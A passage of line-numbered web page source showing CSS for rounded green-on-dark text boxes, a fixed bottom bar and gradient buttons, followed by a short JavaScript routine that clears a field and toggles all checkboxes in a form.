1541 .textround {
1542 border: 2px solid #14ab00;
1543 padding: 3px;
1544 background-color: #303030;
1545 outline-color:#14ab00;
1546 -webkit-border-top-left-radius: 7px;
1547 -khtml-border-radius-topleft: 7px;
1548 -moz-border-radius-topleft: 7px;
1549 border-top-left-radius: 7px;
1550 -webkit-border-bottom-right-radius: 7px;
1551 -khtml-border-radius-bottomright: 7px;
1552 -moz-border-radius-bottomright: 7px;
1553 border-bottom-right-radius: 7px;
1554 -webkit-border-bottom-left-radius: 7px;
1555 -khtml-border-radius-bottomleft: 7px;
1556 -moz-border-radius-bottomleft: 7px;
1557 border-bottom-left-radius: 7px;
1558 -webkit-border-top-right-radius: 7px;
1559 -khtml-border-radius-topright: 7px;
1560 -moz-border-radius-topright: 7px;
1561 border-bottom-top-radius: 7px;
1562 }
1563 #xbox {
1564 width: 100%;
1565 position: fixed;
1566 bottom: 0;
1567 left: 0;
1568 height: 70px;
1569 padding: 5px;
1570 text-align: center;
1571 }
1572 #bottom{
1573 position:absolute;
1574 right:0%;
1575}
1576/* This imageless css button was generated by CSSButtonGenerator.com */
1577input[type=submit], input[type=button] {
1578 background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #14ab00), color-stop(1, #0f6f00) );
1579 background:-moz-linear-gradient( center top, #14ab00 5%, #0f6f00 100% );
1580 filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#14ab00', endColorstr='#0f6f00');
1581 background-color:#14ab00;
1582 -moz-border-radius:6px;
1583 -webkit-border-radius:6px;
1584 border-radius:6px;
1585 border:1px solid #303030;
1586 display:inline-block;
1587 color:#000000;
1588 font-family:arial;
1589 font-size:12px;
1590 font-weight:bold;
1591 padding:5px 10px;
1592 text-decoration:none;
1593}input[type=submit]:hover, input[type=button]:hover {
1594 background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #0f6f00), color-stop(1, #14ab00) );
1595 background:-moz-linear-gradient( center top, #0f6f00 5%, #14ab00 100% );
1596 filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#0f6f00', endColorstr='#14ab00');
1597 background-color:#0f6f00;
1598}input[type=submit]:active, input[type=button]:active {
1599 position:relative;
1600 top:1px;
1601}
1602</style>
1603<script type="text/javascript">
1604function removeValue() {
1605document.getElementById('ch').value='';
1606}
1607checked=false;
1608function checkall (checkboxall) {
1609 var aa= document.getElementById('checkboxall');
1610 if (checked == false)
1611 {
1612 checked = true
1613 }
1614 else
1615 {
1616 checked = false
1617 }
1618 for (var i =0; i < aa.elements.length; i++)
1619 {
1620 aa.elements[i].checked = checked;
1621 }
1622 }
1623</script>